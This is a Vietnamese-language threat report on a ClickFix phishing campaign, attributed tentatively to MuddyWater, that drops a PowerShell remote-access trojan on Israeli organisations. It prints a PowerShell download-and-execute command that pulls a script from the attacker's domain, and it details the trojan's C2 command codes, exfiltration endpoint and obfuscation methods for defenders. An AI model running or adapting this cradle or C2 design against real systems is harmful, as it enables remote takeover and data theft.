Các tác nhân đe dọa đã khởi động một chiến dịch tấn công mạng có mục tiêu địa lý cụ thể, nhắm vào cơ sở hạ tầng và các tổ chức doanh nghiệp của Israel. Cuộc tấn công mạng tinh vi này được phát hiện bởi FortiGuard Labs của Fortinet, cho thấy sự gia tăng về độ phức tạp trong các chiến dịch nhắm mục tiêu.
Tổng quan về Chiến dịch Tấn công Mạng
Chiến dịch được triển khai độc quyền thông qua các hệ thống Windows, sử dụng các script PowerShell. Chuỗi tấn công này cho phép truy cập từ xa, tạo điều kiện thuận lợi cho việc trích xuất dữ liệu, giám sát liên tục và di chuyển ngang trong các mạng bị xâm nhập.
Hoạt động này được phân loại là có mức độ nghiêm trọng cao. Nó tận dụng các email phishing được ngụy trang thành lời mời tham gia các buổi hướng dẫn về quản lý vật tư y tế thời chiến. Các email này được phát tán thông qua các hệ thống email nội bộ bị xâm nhập nhằm tăng tỷ lệ lây nhiễm.
Kỹ thuật Truy cập Ban đầu và Lây nhiễm
Chiến thuật Email Phishing và Social Engineering
Vector truy cập ban đầu bắt đầu bằng các email phishing. Các email này thúc giục người nhận nhấp vào các liên kết được nhúng, chuyển hướng họ đến một giao diện Microsoft Teams giả mạo. Việc này nhằm mục đích lừa đảo người dùng thực hiện các hành động độc hại.
Trang giả mạo này sử dụng một chiến thuật kỹ thuật xã hội được gọi là “ClickFix”. Kỹ thuật này hướng dẫn người dùng nhấn tổ hợp phím Windows + R để mở hộp thoại Run. Sau đó, họ được yêu cầu dán một chuỗi đã sao chép từ clipboard và thực thi nó. Điều này che giấu việc khởi chạy một lệnh PowerShell độc hại.
Cơ chế Tải và Thực thi Mã độc PowerShell
Trong HTML của trang web giả mạo, ba chuỗi được mã hóa Base64 và làm xáo trộn đã được nhúng. Khi được giải mã, chúng tạo thành một lệnh tương tự như sau. Lệnh này được thiết kế để truy xuất và chạy một script thứ cấp từ máy chủ của kẻ tấn công.
powershell IEX ((Invoke-RestMethod -Uri https://pharmacynod[.]com/Fix -Method GET).note.body)Script tải xuống này có nhiệm vụ tải các tệp như test.html vào thư mục Public Downloads của nạn nhân. Các tệp này chứa các khối dữ liệu được mã hóa nhị phân, được phân tách bằng các dấu phân cách như “kendrick”.
Phân tích Sâu Mã độc PowerShell RAT
Quy trình Tải và Giải mã
Một script PowerShell tiếp theo sẽ xử lý các khối dữ liệu này. Nó thực hiện việc tách các khối, chuyển đổi dữ liệu nhị phân thành các ký tự ASCII, và sau đó lắp ráp lại chúng thành mã thực thi. Cuối cùng, một mã độc PowerShell Remote Access Trojan (RAT) được triển khai hoàn toàn bằng PowerShell.
Phân tích sâu hơn cho thấy hành vi của bộ tải RAT bao gồm việc tải xuống nội dung bị làm xáo trộn. Điều này bao gồm các chuỗi Base64 được nén, sau đó được giải nén thông qua các hàm tùy chỉnh để thực thi trong bộ nhớ.
Ví dụ, các script đọc các dòng cụ thể từ test.html, trích xuất các chuỗi được gắn thẻ, chia tách theo dấu phân cách, thực hiện chuyển đổi nhị phân sang ký tự (ví dụ: nhị phân “1100110” bằng thập phân 102, tương ứng với ký tự “f”), và gọi mã kết quả bằng IEX.
Chuỗi tấn công này đỉnh điểm là một RAT bền vững, với máy chủ Command-and-Control (C2) được mã hóa cứng thành pharmacynod[.]com và sử dụng HTTPS cho tất cả các giao tiếp.
Cơ chế Giao tiếp và Duy trì
Khi lây nhiễm, một hàm “init” sẽ thu thập thông tin chi tiết về nạn nhân như tên miền Windows, tên máy tính và tên người dùng. Thông tin này được nén và đảo ngược hai lần bằng GZip và Base64, sau đó được đăng ký thông qua endpoint /16625.
RAT duy trì sự bền vững thông qua một vòng lặp thăm dò vô hạn. Nó ngủ trong các khoảng thời gian ngẫu nhiên (từ 2-7 giây) trước khi thực hiện các yêu cầu POST để truy xuất lệnh. Điều này giúp tránh bị phát hiện và duy trì kết nối với C2.
Các phản hồi từ C2 được nén, đảo ngược và tiền tố bằng các mã như 7979 cho việc khởi tạo lại, 5322 cho việc tải xuống payload thông qua System.Net.WebClient, 4622 để điều chỉnh khoảng thời gian thăm dò, hoặc 2474 cho việc thực thi PowerShell tùy ý với đầu ra được trích xuất đến /17361. Đây là dấu hiệu của một cuộc tấn công mạng có chủ đích.
Kỹ thuật Né tránh Phát hiện
Các kỹ thuật né tránh bao gồm việc sử dụng nhiều lớp làm xáo trộn như nén GZip kép, mã hóa Base64, đảo ngược chuỗi và thay thế an toàn URL. Các kỹ thuật này được kết hợp với các yêu cầu HTTP .NET gốc, mô phỏng lưu lượng truy cập hợp pháp thông qua thông tin đăng nhập mặc định, proxy và user-agent được đặt qua urlmon.dll. Điều này làm cho việc phát hiện mã độc PowerShell trở nên khó khăn hơn.
IOCs và Chỉ số Nhận dạng
Các chỉ số thỏa hiệp (IOCs) được xác định trong chiến dịch tấn công mạng này bao gồm:
- Tên miền Command-and-Control (C2):
pharmacynod[.]com
Đánh giá Mối đe dọa và Liên kết Attribution
Việc gán tội cho chiến dịch này có những điểm chồng chéo tiềm năng với nhóm đe dọa MuddyWater, một nhóm đã biết. Điều này dựa trên mục tiêu theo khu vực, khả năng mở rộng ngang từ các môi trường bị xâm nhập và các chiến thuật scripting tương tự.
Tuy nhiên, các điểm khác biệt như việc tránh các công cụ quản lý từ xa và các máy chủ tệp công cộng, cùng với việc sử dụng RAT hoàn toàn bằng PowerShell mới lạ, cho thấy khả năng đây là sự tiến hóa hoặc bắt chước của một tác nhân khác trong bối cảnh an ninh mạng ngày càng phức tạp.
Biện pháp Phòng ngừa và Phát hiện
Chiến dịch này nhấn mạnh những rủi ro của các cuộc tấn công “living-off-the-land”, nơi kẻ tấn công sử dụng các công cụ và tính năng hợp pháp của hệ thống để thực hiện các hoạt động độc hại, gây khó khăn cho việc phát hiện. Để phòng chống các mối đe dọa này, Fortinet cung cấp các biện pháp bảo vệ toàn diện.
Các biện pháp bảo vệ của Fortinet bao gồm các chữ ký chống virus như PowerShell/Agent.PH!tr, phát hiện điểm cuối thông qua FortiEDR, và chặn mạng thông qua IPS và lọc DNS để giảm thiểu các mối đe dọa như vậy. Việc cập nhật các giải pháp an ninh mạng là điều tối quan trọng.
